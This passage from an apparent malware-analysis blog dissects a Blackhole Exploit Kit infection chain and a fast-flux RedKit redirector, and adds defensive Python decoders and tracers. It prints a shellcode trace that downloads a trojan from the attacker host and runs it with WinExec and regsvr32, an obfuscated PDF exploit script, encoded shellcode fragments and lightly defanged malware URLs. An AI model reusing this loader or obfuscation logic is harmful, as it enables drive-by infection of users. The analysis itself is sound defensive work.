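    new_ports = sorted(k for k in after if k not in before)
    gone_ports = sorted(k for k in before if k not in after)
    state_changes = sorted(
        (k, before[k][0], after[k][0])
        for k in before if k in after and before[k][0] != after[k][0])
    return {
        'new_ports': [p for p, _ in new_ports],
        'gone_ports': [p for p, _ in gone_ports],
        'state_changes': [(p, b, a) for (p, _), b, a in state_changes],
        # services that were reachable and are now being filtered: the host's
        # operator changed its firewall between the two runs
        'newly_filtered': [p for (p, _), b, a in state_changes if b == 'open' and a == 'filtered'],
    }


if __name__ == '__main__':
    report = diff_scans(parse_ports(SCAN_BEFORE), parse_ports(SCAN_AFTER))
    for key, value in report.items():
        print('%-15s %s' % (key + ':', value))
```

Note that the diff also flags 5000/tcp (UPnP) as newly filtered, which the hand-written legend above does not mark; that is exactly the kind of change that is easy to miss when diffing by eye.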
What about the web services (ports 80 and 8080)? Let's see what happens on port 8080:
GET / HTTP/1.1
User-Agent: blah
Host: virtual-geocaching.net:8080
Accept: */*

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1 <---- here
Accept-Ranges: bytes
ETag: W/"7777-1279522786000"
Last-Modified: Mon, 19 Jul 2010 06:59:46 GMT
Content-Type: text/html
Content-Length: 7777
Date: Tue, 18 Sep 2012 08:48:01 GMT
While this is what happens on port 80:
GET / HTTP/1.1
User-Agent: blah
Host: virtual-geocaching.net
Accept: */*

HTTP/1.1 403 Forbidden
Server: nginx/1.3.3 <--- here
Date: Tue, 18 Sep 2012 08:51:49 GMT
Content-Type: text/html; charset=iso-8859-1
Content-Length: 202
Connection: close
↑So on TCP/8080 we see Tomcat (Apache-Coyote is Tomcat's HTTP connector) and on TCP/80 nginx. So now we see nginx, Apache Tomcat, file sharing, telnet, ssh and an ftp server. The filtered ports are nessus, for port scanning, and a squid proxy, which I probed and which appears to be set up for outbound use. I have seen a number of Blackhole hosts, but never a guarded one running heavy services like this; moreover NFS and LDAP services are also running, which suggests record keeping or maybe C&C activity on it. OK, let's continue with what this BHEK actually does now..

Infector scheme and malware

Consulting my EK mentor @kafein, who kindly guides me in EK infection cases: this looked like an old version of BHEK (1.2.5), but since there are some changes it has possibly been upgraded to the latest BHEK v2, so I used a tool on a FreeBSD box to check the infector scheme. We picked the latest infector structure from urlQuery:
virtual-geocaching.net/main.php?page=7de3f5c4200c896e
..And this is what I fetched as samples: ↑all of this evil mess is what the user gets by clicking one infector URL above. File details are as follows:
File                              MD5                               Size
AcroPDF.PDF                       50583375d345fb7a294e26094601699a  18406
field.swf                         d41d8cd98f00b204e9800998ecf8427e  0 (empty file)
Gam.jar                           ab4af9072132f170024a9072e0288459  32171
main.php@page=7de3f5c4200c896e    de277f4802b1b59bb2d0f2cafb3137a3  69023
shellcode.sc                      ac157a90724aec74a1de6e0a20d4db0d  466
wpbt0.dll/e88d779.exe             3158bc97bf424fcd905caa22b29767b9  119143
These come through the redirected URLs of the infector below:
/main.php?page=7de3f5c4200c896e <-- JS/Obfs infector (landing page)
/Gam.jar                        <-- Java exploit CVE-2012-1723/CVE-2012-4681 w/ shellcode
/data/ap2.php                   <-- PDF malware Pdfka/EXP with shellcode
/w.php?f=80f39&e=1              <-- payload EXE (Troj/Cridex, dropped by the JS/HTML shellcode)
/w.php?f=80f39&e=2              <-- payload EXE (Troj/Cridex, dropped by the PDF)
/data/hhcp.php?c=80f39          <-- 0 bytes (link for the SWF)
/data/field.swf                 <-- 0 bytes, supposed to be Flash/Shockwave
/w.php?f=80f39&e=4              <-- URL dropped by the PDF shellcode
↑The point of this scheme is to infect the user with Trojan/Cridex. The infector scheme is as follows: the landing page is HTML containing obfuscated JS code; a neutralized sample is here---->>[PASTEBIN], and the deobfuscated code is here---->>[PASTEBIN]. There you can see the BHEK plugin-detection code that exploits your browser via the vulnerable component, along the routes below:
Java Object (Gam.jar) --> shellcode1 --> Troj/Cridex(PE)
PDF File (AcroPDF.PDF)--> shellcode2 --> Troj/Cridex(PE)
DOMDocs Msxml2.XMLHTTP --------> Troj/Cridex(PE)
Java Exploit javaplugin.191_40 --> shellcode1 --> Troj/Cridex(PE)
JavaWebStart.isInstalled -->shellcode1 --> Troj/Cridex(PE)
SWF Exploit (field.swf) --> null (at least at this moment..)
Landing page itself/HTML --> shellcode1 --> Troj/Cridex(PE)
The above scheme was recorded in log at my freebsd box below:
[h00p] URL: h00p://virtual-geocaching.net/main.php?page=7de3f5c4200c896e (Status: 200, Referrer: None)



[Navigator URL Translation] Gam.jar --> h00p://virtual-geocaching.net/Gam.jar
[h00p] URL: h00p://virtual-geocaching.net/Gam.jar (Status: 200, Referrer: h00p://virtual-geocaching.net/main.php?page=7de3f5c4200c896e)
Saving applet Gam.jar

[Window] Eval argument length > 64 (33842)
ActiveXObject: msxml2.xmlh00p
ActiveXObject: acropdf.pdf
Unknown ActiveX Object: shockwaveflash.shockwaveflash.15
Unknown ActiveX Object: shockwaveflash.shockwaveflash.14
Unknown ActiveX Object: shockwaveflash.shockwaveflash.13
Unknown ActiveX Object: shockwaveflash.shockwaveflash.12
Unknown ActiveX Object: shockwaveflash.shockwaveflash.11
ActiveXObject: shockwaveflash.shockwaveflash.10


Unknown ActiveX Object: javawebstart.isinstalled.1.9.1.0
Unknown ActiveX Object: javawebstart.isinstalled.1.9.0.0
Unknown ActiveX Object: javawebstart.isinstalled.1.8.1.0
Unknown ActiveX Object: javawebstart.isinstalled.1.8.0.0
ActiveXObject: javawebstart.isinstalled.1.7.1.0
Unknown ActiveX Object: javaplugin.171_40
Unknown ActiveX Object: javaplugin.171_39
Unknown ActiveX Object: javaplugin.171_38
Unknown ActiveX Object: javaplugin.171_37
Unknown ActiveX Object: javaplugin.171_36
Unknown ActiveX Object: javaplugin.171_35
Unknown ActiveX Object: javaplugin.171_34
Unknown ActiveX Object: javaplugin.171_33
Unknown ActiveX Object: javaplugin.171_32
Unknown ActiveX Object: javaplugin.171_31
ActiveXObject: javaplugin.171_30
ActiveXObject: javawebstart.isinstalled.1.7.1.0
[Navigator URL Translation] ./data/ap2.php --> h00p://virtual-geocaching.net/data/ap2.php
[h00p] URL: h00p://virtual-geocaching.net/data/ap2.php (Status: 200, Referrer: h00p://virtual-geocaching.net/main.php?page=7de3f5c4200c896e)
[Navigator URL Translation] ./data/hhcp.php?c=80f39 --> h00p://virtual-geocaching.net/data/hhcp.php?c=80f39
[h00p] URL: h00p://virtual-geocaching.net/data/hhcp.php?c=80f39 (Status: 200, Referrer: h00p://virtual-geocaching.net/main.php?page=7de3f5c4200c896e)






ActiveXObject: D27CDB6E-AE6D-11CF-96B8-444553540000
[h00p] URL: h00p://virtual-geocaching.net/w.php?f=80f39&e=1 (Status: 200, Referrer: h00p://virtual-geocaching.net/main.php?page=7de3f5c4200c896e)
Saving remote content at h00p://virtual-geocaching.net/w.php?f=80f39&e=1 (MD5: 3158bc97bf424fcd905caa22b29767b9)

[Navigator URL Translation] ./data/ap2.php --> h00p://virtual-geocaching.net/data/ap2.php
[iframe redirection] h00p://virtual-geocaching.net/main.php?page=7de3f5c4200c896e -> h00p://virtual-geocaching.net/data/ap2.php
[h00p] URL: h00p://virtual-geocaching.net/data/ap2.php (Status: 200, Referrer: h00p://virtual-geocaching.net/main.php?page=7de3f5c4200c896e)

[Navigator URL Translation] ./data/hhcp.php?c=80f39 --> h00p://virtual-geocaching.net/data/hhcp.php?c=80f39
[iframe redirection] h00p://virtual-geocaching.net/main.php?page=7de3f5c4200c896e -> h00p://virtual-geocaching.net/data/hhcp.php?c=80f39
[h00p] URL: h00p://virtual-geocaching.net/data/hhcp.php?c=80f39 (Status: 200, Referrer: h00p://virtual-geocaching.net/main.php?page=7de3f5c4200c896e)

[Navigator URL Translation] data/field.swf --> h00p://virtual-geocaching.net/data/field.swf
[h00p] URL: h00p://virtual-geocaching.net/data/field.swf (Status: 200, Referrer: h00p://virtual-geocaching.net/main.php?page=7de3f5c4200c896e)
Saving remote content at data/field.swf (MD5: d41d8cd98f00b204e9800998ecf8427e)



[Navigator URL Translation] data/field.swf --> h00p://virtual-geocaching.net/data/field.swf
[h00p] URL: h00p://virtual-geocaching.net/data/field.swf (Status: 200, Referrer: h00p://virtual-geocaching.net/main.php?page=7de3f5c4200c896e)
About the shellcode: we found 2 shellcodes, one coded in the landing page and the other coded in the PDF file, call them shellcode 1 & 2. Shellcode 1 decoded:
BOOL VirtualProtectEx (
HANDLE = 0x298dda60 => none;
LPCVOID = 0x298dda70 => none;
DWORD dwSize = 255;
DWORD flNewProtect = 64;
PDWORD lpflOldProtectt = 64;
) = 0x1;
HMODULE LoadLibraryA (
LPCTSTR = 0x298ddad0 => = "urlmon"; //urlmon.dll used
) = 0x7df20000;
DWORD GetTempPathA (
DWORD nBufferLength = 248;
LPTSTR = 0x298ddb00 =>
= "c:\tmp\";
) = 0x7;
HRESULT URLDownloadToFile ( //downloads...
LPUNKNOWN = 0x28621a40 => none;
LPCTSTR = 0x28621a48 =>
= "h00p://virtual-geocaching.net/w.php?f=80f39&e=1";
LPCTSTR = 0x298ddb50 =>
= "c:\tmp\wpbt0.dll"; // saved here...
DWORD dwReserved = 0;
LPBINDSTATUSCALLBACK lpfnCB = 0;
) = 0x0;
UINT WINAPI WinExec ( // execute it here..
LPCSTR = 0x298ddb70 =>
= "c:\tmp\wpbt0.dll";
UINT uCmdShow = 0;
) = 0x20;
UINT WINAPI WinExec (
LPCSTR = 0x298ddbb0 =>
= "regsvr32 -s c:\tmp\wpbt0.dll"; //register it...
UINT uCmdShow = 0;
) = 0x20;
BOOL TerminateThread (
HANDLE hThread = -2; // exit...
DWORD dwExitCode = 0;
) = 0x0;
The other one, shellcode 2, is very similar but aims at a different download URL:
68 74 74 70 3A 2F 2F 76 69 72 74 75 61 6C 2D 67 65 
6F 63 61 63 68 69 6E 67 2E 6E 65 74 2F 77 2E 70 68
70 3F 66 3D 38 30 66 33 39 26 65 3D 34 00 00
Means: "h00p://virtual-geocaching.net/w.php?f=80f39&e=4"
As for the PDF infector, most scanners cannot detect the evil script written in it:
<xfa:script contentType='application/x-javascript'>
with(event){
e=target["eval"];
if((app.addMenuItem+"").indexOf("Me"+"nuItem")!=-1){a=target.subject;}
}
a=a.split(".");
s="";
z=a;
for(i in a){
zz=i;
}
for(i=0;i<zz;i++){
s+=String.fromCharCode(-33+1*z[i]);
}
e(""+s);
</xfa:script>
↑While the Subject object contains exploit & shellcode:
<</Subject(130.145.145.79.130.141.134.147.149.94.134
77.65.133.133.133.77.65.134.134.134.77.65.135.135.13 //exploit
92.151.130.147.65.128.141.82.94.67.85.132.83.81.87.8
1.81.81.81.81.81.81.81.81.81.81.81.81.82.83.84.90.89
.92.80.136.77.72.72.74.92.151.130.147.65.128.141.83.
1.81.81.81.81.81.81.81.81.81.81.81.81.81.81.81.81.81
141.130.132.134.73.80.92.80.136.77.72.72.74.92.128.1
:
snip
:
CreationDate(66;83;e4;fc;fc;85;e4; //shelcode
;08;c1;cb;0d;03;da;40;eb;f1;3b;1f;
;05;ff;e3;68;6f;6e;00;00;68;75;72;
;c1;04;30;88;44;1d;04;41;51;6a;00;...blah
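The three encodings shown above (the hex dump of shellcode 2, the dotted-decimal /Subject string that the XFA script turns back into JavaScript, and the ';'-separated hex bytes hiding the PDF shellcode in /CreationDate) are each a few lines to undo. As an added example (not code from the original post), the decoders below do exactly that; the sample inputs are the fragments printed above, and nothing that was snipped there is reconstructed, so the /Subject decode only yields its first eleven characters. Note the XFA script's loop runs `for(i=0;i<zz;i++)` with zz set to the last index, so the final element of the split string is never decoded; the decoder reproduces that quirk by default.

```python
"""Decoders for the BHEK PDF/shellcode fragments: hexdump -> bytes -> strings,
the XFA /Subject dotted-decimal encoding, and the /CreationDate hex byte list."""
import re

# Constructed sample inputs, copied from the fragments shown in the post.
SHELLCODE2_HEXDUMP = """
68 74 74 70 3A 2F 2F 76 69 72 74 75 61 6C 2D 67 65
6F 63 61 63 68 69 6E 67 2E 6E 65 74 2F 77 2E 70 68
70 3F 66 3D 38 30 66 33 39 26 65 3D 34 00 00
"""

SUBJECT_FRAGMENT = "130.145.145.79.130.141.134.147.149.94.134"

CREATIONDATE_FRAGMENT = """66;83;e4;fc;fc;85;e4;
;08;c1;cb;0d;03;da;40;eb;f1;3b;1f;
;05;ff;e3;68;6f;6e;00;00;68;75;72;
;c1;04;30;88;44;1d;04;41;51;6a;00;"""


def hexdump_to_bytes(text):
    """Space/newline separated two-digit hex tokens -> bytes."""
    return bytes(int(tok, 16) for tok in re.findall(r'\b[0-9A-Fa-f]{2}\b', text))


def printable_strings(data, min_len=6):
    """ASCII runs of at least min_len bytes, the way `strings` would list them."""
    pat = rb'[\x20-\x7e]{%d,}' % min_len
    return [m.group().decode('ascii') for m in re.finditer(pat, data)]


def decode_xfa_subject(subject, faithful=True):
    """Undo the XFA script: split on '.', each value minus 33 is a char code.
    The script's loop bound is the last index, so the final element is skipped;
    faithful=True reproduces that, faithful=False decodes every element."""
    vals = subject.split('.')
    if faithful:
        vals = vals[:-1]
    return ''.join(chr(int(v) - 33) for v in vals if v.strip().isdigit() and int(v) >= 33)


def creationdate_to_bytes(text):
    """';'-separated hex byte tokens (wrapped lines may start with ';') -> bytes."""
    toks = [t.strip() for t in text.replace('\n', ';').split(';')]
    return bytes(int(t, 16) for t in toks if re.fullmatch(r'[0-9A-Fa-f]{2}', t))


if __name__ == '__main__':
    sc2 = hexdump_to_bytes(SHELLCODE2_HEXDUMP)
    print('shellcode 2 strings:', printable_strings(sc2))
    print('subject decodes to :', repr(decode_xfa_subject(SUBJECT_FRAGMENT)))
    sc = creationdate_to_bytes(CREATIONDATE_FRAGMENT)
    print('pdf shellcode      : %d bytes, starts with %s' % (len(sc), sc[:4].hex()))
```

The `68 6f 6e 00 00` / `68 75 72` pushes visible in the CreationDate fragment are the shellcode building the string "urlmon" on the stack, which matches the LoadLibraryA("urlmon") call seen in the shellcode 1 trace.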
The payload itself is the PE file of Trojan/Cridex , which has the below analysis:
Sample's MD5 3158bc97bf424fcd905caa22b29767b9

0000 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 MZ..............
0010 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ........@.......
0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0030 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 ................
0040 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 ........!..L.!Th
0050 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F is program canno
0060 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 t be run in DOS
0070 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00 mode....$.......
0080 50 45 00 00 4C 01 04 00 1A 64 57 50 00 00 00 00 PE..L....dWP....
0090 00 00 00 00 E0 00 0F 01 0B 01 02 32 00 4A 00 00 ...........2.J..

Compile Time: 2012-09-18 02:55:38
CRC Fail: Claimed: 0 Actual: 130407
Packer: PureBasic 4.x -> Neil Hodgson
Sections:
.code 0x1000 0x24cf 9728
.text 0x4000 0x23c8 9216
.rdata 0x7000 0x10 512
.data 0x8000 0xa8c 1536

Drops:
%Appdata%\kb00085031.exe (payload)
%Temp%\exp1.tmp
%temp%\exp1.tmp.bat

Collects information:
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers (TransparentEnabled)
HKLM\System\CurrentControlSet\Control\Terminal Server (TSUserEnabled)

At the time I got this, only 3 AV products detected it:
Symantec : W32.Cridex
McAfee-GW-Edition : Heuristic.BehavesLike.Win32.Downloader.A
Comodo : TrojWare.Win32.Trojan.Agent.Gen
I uploaded samples to Virus Total to check/monitor RECENT detection ratio:
So the moral of the story is: with BHEK infector domains lasting at most 2 days, with landing pages changing per click on BHEK2 and hourly on the previous version, and with them now using network tools for protection and C&C deployment, we have a strong opponent that we mustn't ignore.

#MalwareMustDie!

Sunday, 16 September 2012

This is a quicky, so please bear with it. The information might be important for people handling malware infector sites.

While handling a report that led to the RedKit Exploit Kit/Pack, I came across a domain that actively redirects users to the RedKit Exploit Kit's landing page.
This domain is qaqipwel.ru

It uses pseudo (constantly changing) NS and A records to avoid blocking and tracking; it is currently up and alive, and it has a strong DNS backbone that round-robins its IP/DNS addresses for the purpose of distributing malware landing pages or spam pages.
I tagged and checked this for only a couple of days so far, to confirm the redirection activity above. Here are the details. (Warning: this might not be too interesting for client security solution people, and I am not going to discuss the RedKit exploit itself in this post; please see this link for the details: RedKit Exploit Kit Information--->>HERE)


The url provided by qaqipwel.ru is changed, currently is below:
h00p://qaqipwel.ru/count22.php

If you track it correctly you will end up at these redirections for the last 24 hrs:
h00p://sa-wan.com/93020006.html // RedKit EK Landing Page
h00p://cestasefloresluana.com.br/30400006.html // RedKit EK Landing Page
h00p://mytabletcialis.com/ // Clialis/viagra site
h00p://goherdscan.com/ // Canadian Pharmacy
As PoC: when fetching the infector page you will get many redirection tricks, like:

Case 1
--15:35:30--  h00p://qaqipwel.ru/count22.php
           => `count22.php'
Resolving qaqipwel.ru... 77.38.198.12
Connecting to qaqipwel.ru|77.38.198.12|:80... connected.
HTTP request sent, awaiting response... 302
Location: h00p://sa-wan.com/93020006.html [following]
--15:35:33--  h00p://sa-wan.com/93020006.html
           => `93020006.html'
Resolving sa-wan.com... 72.167.232.75
Connecting to sa-wan.com|72.167.232.75|:80... connected.

Case 2
--15:49:39--  h00p://qaqipwel.ru/count22.php
           => `count22.php.1'
Resolving qaqipwel.ru... 77.90.120.34
Connecting to qaqipwel.ru|77.90.120.34|:80... connected.
HTTP request sent, awaiting response... 200
Length: 146 []
15:49:40 (0.00 B/s) - `count22.php' saved [146/146]

HTTP/1.1 200
Server: Apache
Content-Length: 142
Content-Type:
Last-Modified: .., 16 ... 2012 06:42:12 GMT
Accept-Ranges: bytes
Server: nginx/0.8.34
Date: Sun, 16 Sep 2012 06:42:15 GMT
X-Powered-By: PHP/5.3.2
<!DOCTYPE HTML><html><head>
<script type="text/javascript">
parent.location.href = "h00p://goherdscan.com/";</script>
:
Case 3 (via tor)
--2012-09-16 15:16:04--  h00p://qaqipwel.ru/count22.php
Resolving localhost (localhost)... 127.0.0.1, ::1
Connecting to localhost (localhost)|::1|:8118... connected.
Proxy request sent, awaiting response... 302
Location: h00p://cestasefloresluana.com.br/30400006.html [following]
--2012-09-16 15:16:12--  h00p://cestasefloresluana.com.br/30400006.html
Connecting to localhost (localhost)|::1|:8118... connected.

Case 4
--2012-09-16 15:20:10--  h00p://qaqipwel.ru/count22.php
Resolving localhost (localhost)... 127.0.0.1, ::1
Connecting to localhost (localhost)|::1|:8118... connected.
Proxy request sent, awaiting response... 200
Length: 146 []
Saving to: `count22.php'

100%[=============>] 146  361B/s  in 0.4s

Last-modified header invalid -- time-stamp ignored.
2012-09-16 15:20:12 (361 B/s) - `count22.php' saved [146/146]

$ cat count22.php
<!DOCTYPE HTML><html><head>
<script type="text/javascript">
parent.location.href = "h00p://mytabletcialis.com/";</script>
:
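The redirector answers in two different ways depending on the visitor: a 302 with a Location header (Cases 1 and 3) or a 200 page whose JavaScript sets `parent.location.href` (Cases 2 and 4), so a crawler that only follows HTTP redirects logs the second kind as a dead end. As an added example (not tooling from the original post), the script below normalises both into a next-hop URL and walks the hops into a chain; it goes a little beyond the post by also handling `<meta http-equiv="refresh">`, which was not observed on this domain. The sessions are constructed from the wget output above, with plain http scheme and the page bodies abbreviated.

```python
"""Extract the next hop from a redirector response (3xx Location, JS location
assignment, or meta refresh) and follow such hops into a redirect chain."""
import re

JS_LOCATION_RE = re.compile(
    r'\blocation(?:\.href)?\s*=\s*["\']([^"\']+)["\']', re.IGNORECASE)
META_REFRESH_RE = re.compile(
    r'http-equiv\s*=\s*["\']?refresh["\']?[^>]*?content\s*=\s*["\']?\s*\d+\s*;\s*url=([^"\'>\s]+)',
    re.IGNORECASE)


def redirect_target(status, headers, body):
    """-> (method, url) for a redirecting response, or (None, None) for a terminal page."""
    hdrs = {k.lower(): v for k, v in headers.items()}
    if status in (301, 302, 303, 307, 308) and hdrs.get('location'):
        return 'http-%d' % status, hdrs['location']
    m = JS_LOCATION_RE.search(body or '')
    if m:
        return 'js', m.group(1)
    m = META_REFRESH_RE.search(body or '')
    if m:
        return 'meta-refresh', m.group(1)
    return None, None


def follow_chain(responses, start, max_hops=10):
    """responses: {url: (status, headers, body)} captured offline.
    Returns the URLs visited, stopping at a terminal page, an unknown URL or a loop."""
    chain, url = [start], start
    while url in responses and len(chain) <= max_hops:
        _method, nxt = redirect_target(*responses[url])
        if not nxt or nxt in chain:
            break
        chain.append(nxt)
        url = nxt
    return chain


# Constructed sessions built from the post's wget output (bodies abbreviated).
CASE1 = {
    'http://qaqipwel.ru/count22.php': (302, {'Location': 'http://sa-wan.com/93020006.html'}, ''),
    'http://sa-wan.com/93020006.html': (200, {}, '<html><body>landing page</body></html>'),
}
CASE2_BODY = ('<!DOCTYPE HTML><html><head>\n<script type="text/javascript">\n'
              'parent.location.href = "http://goherdscan.com/";</script>')
CASE2 = {
    'http://qaqipwel.ru/count22.php': (200, {'Server': 'nginx/0.8.34'}, CASE2_BODY),
}

if __name__ == '__main__':
    for name, session in (('Case 1', CASE1), ('Case 2', CASE2)):
        print(name, ' -> '.join(follow_chain(session, 'http://qaqipwel.ru/count22.php')))
```

Because the chain walker only consumes captured responses, it can be replayed over proxy or sandbox logs after the fact; the loop guard matters with redirectors like this one, which cycle visitors between several hosts.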
If you look up the domain, the lookup reports this data:
IP: 62.84.60.2
INET: 62.84.60.0/22
AS: AS39824
ISP: ALMANET-AS JSC AlmaTV
Country: Kazakhstan
State/Region: Almaty City
City: Almaty
Latitude: 43.25
Longitude: 76.95
In reality it looks like this:
Pseudo A (IP) records actually observed:
178.137.1.4
129.241.150.45
89.115.162.87
92.49.3.129
159.224.125.227
88.135.159.37
93.113.237.108
46.186.83.133
188.173.100.142
89.221.112.165
31.14.136.113
77.38.198.12
1.249.216.225
203.142.169.131
109.185.53.194
94.112.97.46
46.120.219.104
112.209.92.132
77.122.122.94
188.241.186.4
:
:
and so on... (233 IPs counted as of Sept 17th 2012)
And the official DNS registration was:
domain: QAQIPWEL.RU (A records per NS changes)
nserver: ns1.chokode.com. 3545 IN A 217.144.208.27
nserver: ns2.chokode.com. 3469 IN A 175.194.252.182
nserver: ns3.chokode.com. 3394 IN A 87.110.121.10
nserver: ns4.chokode.com. 3394 IN A 178.155.43.251
nserver: ns5.chokode.com. 3600 IN A 111.184.220.233
nserver: ns6.chokode.com. 3394 IN A 94.53.46.22
state: REGISTERED, DELEGATED, UNVERIFIED
person: Private Person
registrar: REGGI-REG-RIPN
admin-contact: http://www.webdrive.ru/webmail/
created: 2012.09.06
paid-till: 2013.09.06
free-date: 2013.10.07
While in practice you get these random DNS records:
Domain Queried : qaqipwel.ru
Tracing to qaqipwel.ru[a] via a.root-servers.net., maximum of 1 retries
a.root-servers.net. (198.41.0.4)
 |\___ a.dns.ripn.net [ru] (2001:0678:0017:0000:0193:0232:0128:0006) Not queried
 |\___ a.dns.ripn.net [ru] (193.232.128.6)
 |     |\___ ns1.chokode.com [qaqipwel.ru] (91.187.182.249) Got auth.answer
 |     |\___ ns2.chokode.com [qaqipwel.ru] (46.229.107.36) Got auth.answer
 |     |\___ ns3.chokode.com [qaqipwel.ru] (89.115.162.87) Got auth.answer
 |     |\___ ns4.chokode.com [qaqipwel.ru] (109.87.58.1) Got auth.answer
 |     |\___ ns6.chokode.com [qaqipwel.ru] (94.41.4.214) Got auth.answer
 |      \___ ns5.chokode.com [qaqipwel.ru] (89.115.162.87) (cached)
 |\___ b.dns.ripn.net [ru] (2001:0678:0016:0000:0194:0085:0252:0062) Not queried
 |\___ b.dns.ripn.net [ru] (194.85.252.62)
 |     |\___ ns6.chokode.com [qaqipwel.ru] (194.54.180.242) Got auth.answer
 |     |\___ ns2.chokode.com [qaqipwel.ru] (46.211.255.80) Got auth.answer
 |     |\___ ns4.chokode.com [qaqipwel.ru] (93.114.88.159) Got auth.answer
 |     |\___ ns1.chokode.com [qaqipwel.ru] (180.149.212.148) Got auth.answer
 |     |\___ ns3.chokode.com [qaqipwel.ru] (77.221.76.117) Got auth.answer
 |      \___ ns5.chokode.com [qaqipwel.ru] (114.25.144.116) Got auth.answer
 |\___ e.dns.ripn.net [ru] (2001:0678:0015:0000:0193:0232:0142:0017) Not queried
 |\___ e.dns.ripn.net [ru] (193.232.142.17)
 |     |\___ ns6.chokode.com [qaqipwel.ru] (89.102.91.73) Got auth.answer
 |     |\___ ns5.chokode.com [qaqipwel.ru] (88.222.161.159) Got auth.answer
 |     |\___ ns4.chokode.com [qaqipwel.ru] (93.114.88.159) (cached)
 |     |\___ ns3.chokode.com [qaqipwel.ru] (180.149.212.148) (cached)
 |     |\___ ns2.chokode.com [qaqipwel.ru] (93.105.30.91) Got auth.answer
 |      \___ ns1.chokode.com [qaqipwel.ru] (89.40.57.110) Got auth.answer
 |\___ f.dns.ripn.net [ru] (2001:0678:0014:0000:0193:0232:0156:0017) Not queried
 |\___ f.dns.ripn.net [ru] (193.232.156.17)
 |     |\___ ns6.chokode.com [qaqipwel.ru] (111.184.220.233) Got auth.answer
 |     |\___ ns1.chokode.com [qaqipwel.ru] (109.87.58.1) (cached)
 |     |\___ ns3.chokode.com [qaqipwel.ru] (46.160.95.107) Got auth.answer
 |     |\___ ns5.chokode.com [qaqipwel.ru] (111.34.117.125) Got auth.answer
 |     |\___ ns2.chokode.com [qaqipwel.ru] (109.87.58.1) (cached)
 |      \___ ns4.chokode.com [qaqipwel.ru] (37.205.75.204) Got auth.answer
 |\___ d.dns.ripn.net [ru] (2001:0678:0018:0000:0194:0190:0124:0017) Not queried
  \___ d.dns.ripn.net [ru] (194.190.124.17)
        |\___ ns3.chokode.com [qaqipwel.ru] (75.64.99.215) Got auth.answer
        |\___ ns5.chokode.com [qaqipwel.ru] (89.39.7.1) Got auth.answer
        |\___ ns4.chokode.com [qaqipwel.ru] (89.40.57.110) (cached)
        |\___ ns6.chokode.com [qaqipwel.ru] (91.187.181.6) Got auth.answer
        |\___ ns1.chokode.com [qaqipwel.ru] (109.87.58.1) (cached)
         \___ ns2.chokode.com [qaqipwel.ru] (89.102.91.73) (cached)
↑Please see how the IP address of each NS host keeps changing↑ Additionally, some DNS delegation information:
+-d.dns.ripn.net (194.190.124.17)
| +-e.dns.ripn.net (193.232.142.17)
| | +-f.dns.ripn.net (193.232.156.17)
| | | +-ns.ripn.net (194.85.105.17)
| | | | +-ns2.nic.fr (192.93.0.4)
| | | | | +-ns5.msk-ix.net (193.232.128.6)
| | | | | | +-ns9.ripn.net (194.85.252.62)
| | | | | | |
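The trace above is the evidence for the "pseudo DNS" claim: every root-server path hands back a different address for the same nsN.chokode.com, and none of them is the address the registry lists. As an added example (not tooling from the original post), the script below measures that from the trace: how many distinct addresses each NS name resolved to, which addresses are reused under several NS names, and which NS names never showed their registered address. The answer lines are the dnstracer answers copied from the trace above with the tree prefixes stripped (constructed input for this example), and the WHOIS_NS table is the nserver records quoted above.

```python
"""Quantify name-server flux from dnstracer-style answer lines."""
import re
from collections import defaultdict

# Constructed sample: the 30 authoritative answers from the trace above, prefixes stripped.
TRACE_ANSWERS = """
ns1.chokode.com [qaqipwel.ru] (91.187.182.249) Got auth.answer
ns2.chokode.com [qaqipwel.ru] (46.229.107.36) Got auth.answer
ns3.chokode.com [qaqipwel.ru] (89.115.162.87) Got auth.answer
ns4.chokode.com [qaqipwel.ru] (109.87.58.1) Got auth.answer
ns6.chokode.com [qaqipwel.ru] (94.41.4.214) Got auth.answer
ns5.chokode.com [qaqipwel.ru] (89.115.162.87) (cached)
ns6.chokode.com [qaqipwel.ru] (194.54.180.242) Got auth.answer
ns2.chokode.com [qaqipwel.ru] (46.211.255.80) Got auth.answer
ns4.chokode.com [qaqipwel.ru] (93.114.88.159) Got auth.answer
ns1.chokode.com [qaqipwel.ru] (180.149.212.148) Got auth.answer
ns3.chokode.com [qaqipwel.ru] (77.221.76.117) Got auth.answer
ns5.chokode.com [qaqipwel.ru] (114.25.144.116) Got auth.answer
ns6.chokode.com [qaqipwel.ru] (89.102.91.73) Got auth.answer
ns5.chokode.com [qaqipwel.ru] (88.222.161.159) Got auth.answer
ns4.chokode.com [qaqipwel.ru] (93.114.88.159) (cached)
ns3.chokode.com [qaqipwel.ru] (180.149.212.148) (cached)
ns2.chokode.com [qaqipwel.ru] (93.105.30.91) Got auth.answer
ns1.chokode.com [qaqipwel.ru] (89.40.57.110) Got auth.answer
ns6.chokode.com [qaqipwel.ru] (111.184.220.233) Got auth.answer
ns1.chokode.com [qaqipwel.ru] (109.87.58.1) (cached)
ns3.chokode.com [qaqipwel.ru] (46.160.95.107) Got auth.answer
ns5.chokode.com [qaqipwel.ru] (111.34.117.125) Got auth.answer
ns2.chokode.com [qaqipwel.ru] (109.87.58.1) (cached)
ns4.chokode.com [qaqipwel.ru] (37.205.75.204) Got auth.answer
ns3.chokode.com [qaqipwel.ru] (75.64.99.215) Got auth.answer
ns5.chokode.com [qaqipwel.ru] (89.39.7.1) Got auth.answer
ns4.chokode.com [qaqipwel.ru] (89.40.57.110) (cached)
ns6.chokode.com [qaqipwel.ru] (91.187.181.6) Got auth.answer
ns1.chokode.com [qaqipwel.ru] (109.87.58.1) (cached)
ns2.chokode.com [qaqipwel.ru] (89.102.91.73) (cached)
"""

WHOIS_NS = {  # nserver A records from the registry data quoted above
    'ns1.chokode.com': '217.144.208.27', 'ns2.chokode.com': '175.194.252.182',
    'ns3.chokode.com': '87.110.121.10', 'ns4.chokode.com': '178.155.43.251',
    'ns5.chokode.com': '111.184.220.233', 'ns6.chokode.com': '94.53.46.22',
}

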